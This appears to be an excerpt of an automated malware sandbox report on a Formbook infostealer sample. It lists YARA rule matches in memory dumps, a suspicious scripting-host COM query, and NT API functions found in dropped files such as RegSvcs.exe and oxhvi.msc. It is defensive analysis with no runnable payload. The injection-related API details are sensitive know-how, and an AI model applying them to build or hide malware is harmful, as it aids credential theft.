              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1914324145.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000012.00000002.2628367776.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1913627559.0000000001A0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000012.00000002.2628964763.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: Process Memory Space: oxhvi.msc PID: 8084, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 3360, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: ipconfig.exe PID: 3780, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: rundll32.exe PID: 5336, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: oxhvi.msc.exe PID: 7596, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: netsh.exe PID: 1508, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: netsh.exe PID: 5472, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: oxhvi.msc.exe PID: 1796, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: Process Memory Space: cmmon32.exe PID: 2940, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041A330 NtCreateFile,15_2_0041A330
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041A3E0 NtReadFile,15_2_0041A3E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041A460 NtClose,15_2_0041A460
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041A510 NtAllocateVirtualMemory,15_2_0041A510
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041A2EB NtCreateFile,15_2_0041A2EB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041A32A NtCreateFile,15_2_0041A32A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041A382 NtReadFile,15_2_0041A382
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2B60 NtClose,LdrInitializeThunk,15_2_016B2B60
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_016B2BF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2AD0 NtReadFile,LdrInitializeThunk,15_2_016B2AD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2D30 NtUnmapViewOfSection,LdrInitializeThunk,15_2_016B2D30
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2D10 NtMapViewOfSection,LdrInitializeThunk,15_2_016B2D10
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_016B2DF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2DD0 NtDelayExecution,LdrInitializeThunk,15_2_016B2DD0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_016B2C70
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2CA0 NtQueryInformationToken,LdrInitializeThunk,15_2_016B2CA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2F30 NtCreateSection,LdrInitializeThunk,15_2_016B2F30
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2FE0 NtCreateFile,LdrInitializeThunk,15_2_016B2FE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2FB0 NtResumeThread,LdrInitializeThunk,15_2_016B2FB0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2F90 NtProtectVirtualMemory,LdrInitializeThunk,15_2_016B2F90
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_016B2EA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2E80 NtReadVirtualMemory,LdrInitializeThunk,15_2_016B2E80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B4340 NtSetContextThread,15_2_016B4340
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B4650 NtSuspendThread,15_2_016B4650
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2BE0 NtQueryValueKey,15_2_016B2BE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2BA0 NtEnumerateValueKey,15_2_016B2BA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2B80 NtQueryInformationFile,15_2_016B2B80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2AF0 NtWriteFile,15_2_016B2AF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2AB0 NtWaitForSingleObject,15_2_016B2AB0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2D00 NtSetInformationFile,15_2_016B2D00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2DB0 NtEnumerateKey,15_2_016B2DB0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2C60 NtCreateKey,15_2_016B2C60
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2C00 NtQueryInformationProcess,15_2_016B2C00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2CF0 NtOpenProcess,15_2_016B2CF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2CC0 NtQueryVirtualMemory,15_2_016B2CC0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2F60 NtCreateProcessEx,15_2_016B2F60
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2FA0 NtQuerySection,15_2_016B2FA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2E30 NtWriteVirtualMemory,15_2_016B2E30
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2EE0 NtQueueApcThread,15_2_016B2EE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B3010 NtOpenDirectoryObject,15_2_016B3010
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B3090 NtSetValueKey,15_2_016B3090
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B35C0 NtCreateMutant,15_2_016B35C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B39B0 NtGetContextThread,15_2_016B39B0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B3D70 NtOpenThread,15_2_016B3D70
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B3D10 NtOpenProcessToken,15_2_016B3D10
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A29B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00A29B5C
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00591A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_00591A91
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0059F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,8_2_0059F122
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A3355D0_2_00A3355D
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A3B76F0_2_00A3B76F
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A2BF3D0_2_00A2BF3D
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A4C0D60_2_00A4C0D6
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A3A0080_2_00A3A008
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A492D00_2_00A492D0
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A3A2220_2_00A3A222
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A352140_2_00A35214
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A3C27F0_2_00A3C27F
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A543600_2_00A54360
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A346CF0_2_00A346CF
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A586D20_2_00A586D2
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A248AA0_2_00A248AA
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A5480E0_2_00A5480E
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A25AFE0_2_00A25AFE
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A3ABC80_2_00A3ABC8
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A27CBA0_2_00A27CBA
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A3BC050_2_00A3BC05
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A23D9D0_2_00A23D9D
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A34D320_2_00A34D32
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A4BEA70_2_00A4BEA7
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A25F390_2_00A25F39
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A35F0B0_2_00A35F0B
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_3_0102FB908_3_0102FB90
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005520078_2_00552007
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005580378_2_00558037
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0054E0BE8_2_0054E0BE
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0053E1A08_2_0053E1A0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0053225D8_2_0053225D
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005522C28_2_005522C2
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0056A28E8_2_0056A28E
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0054C59E8_2_0054C59E
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005BC7A38_2_005BC7A3
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0056E89F8_2_0056E89F
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005A291A8_2_005A291A
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00566AFB8_2_00566AFB
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00598B278_2_00598B27
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_0055CE308_2_0055CE30
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005671698_2_00567169
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005C51D28_2_005C51D2
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005392408_2_00539240
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005394998_2_00539499
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005517248_2_00551724
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00551A968_2_00551A96
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00539B608_2_00539B60
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00557BAB8_2_00557BAB
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00551D408_2_00551D40
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00557DDA8_2_00557DDA
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0040103015_2_00401030
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041EB4F15_2_0041EB4F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041E56B15_2_0041E56B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041D57315_2_0041D573
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041E57515_2_0041E575
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0041D57615_2_0041D576
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_00402D9015_2_00402D90
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_00409E6015_2_00409E60
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_00402FB015_2_00402FB0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0170815815_2_01708158
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167010015_2_01670100
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171A11815_2_0171A118
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017381CC15_2_017381CC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017401AA15_2_017401AA
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171200015_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173A35215_2_0173A352
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017403E615_2_017403E6
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E3F015_2_0168E3F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0172027415_2_01720274
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017002C015_2_017002C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168053515_2_01680535
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0174059115_2_01740591
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173244615_2_01732446
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0172E4F615_2_0172E4F6
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168077015_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A475015_2_016A4750
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167C7C015_2_0167C7C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169C6E015_2_0169C6E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169696215_2_01696962
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A015_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0174A9A615_2_0174A9A6
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168A84015_2_0168A840
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168284015_2_01682840
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE8F015_2_016AE8F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016668B815_2_016668B8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173AB4015_2_0173AB40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01736BD715_2_01736BD7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167EA8015_2_0167EA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168AD0015_2_0168AD00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171CD1F15_2_0171CD1F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167ADE015_2_0167ADE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01698DBF15_2_01698DBF
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680C0015_2_01680C00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670CF215_2_01670CF2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01720CB515_2_01720CB5
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F4F4015_2_016F4F40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C2F2815_2_016C2F28
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A0F3015_2_016A0F30
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168CFE015_2_0168CFE0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01672FC815_2_01672FC8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FEFA015_2_016FEFA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680E5915_2_01680E59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173EE2615_2_0173EE26
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173EEDB15_2_0173EEDB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173CE9315_2_0173CE93
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692E9015_2_01692E90
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B516C15_2_016B516C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166F17215_2_0166F172
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0174B16B15_2_0174B16B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168B1B015_2_0168B1B0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173F0E015_2_0173F0E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017370E915_2_017370E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016870C015_2_016870C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0172F0CC15_2_0172F0CC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166D34C15_2_0166D34C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173132D15_2_0173132D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C739A15_2_016C739A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017212ED15_2_017212ED
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169B2C015_2_0169B2C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016852A015_2_016852A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173757115_2_01737571
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171D5B015_2_0171D5B0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167146015_2_01671460
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173F43F15_2_0173F43F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173F7B015_2_0173F7B0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017316CC15_2_017316CC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168995015_2_01689950
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169B95015_2_0169B950
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171591015_2_01715910
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016ED80015_2_016ED800
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016838E015_2_016838E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173FB7615_2_0173FB76
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016BDBF915_2_016BDBF9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F5BF015_2_016F5BF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169FB8015_2_0169FB80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F3A6C15_2_016F3A6C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01737A4615_2_01737A46
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173FA4915_2_0173FA49
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0172DAC615_2_0172DAC6
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016C5AA015_2_016C5AA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171DAAC15_2_0171DAAC
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01737D7315_2_01737D73
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01683D4015_2_01683D40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01731D5A15_2_01731D5A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169FDC015_2_0169FDC0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F9C3215_2_016F9C32
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173FCF215_2_0173FCF2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173FF0915_2_0173FF09
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173FFB115_2_0173FFB1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01681F9215_2_01681F92
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01689EB015_2_01689EB0
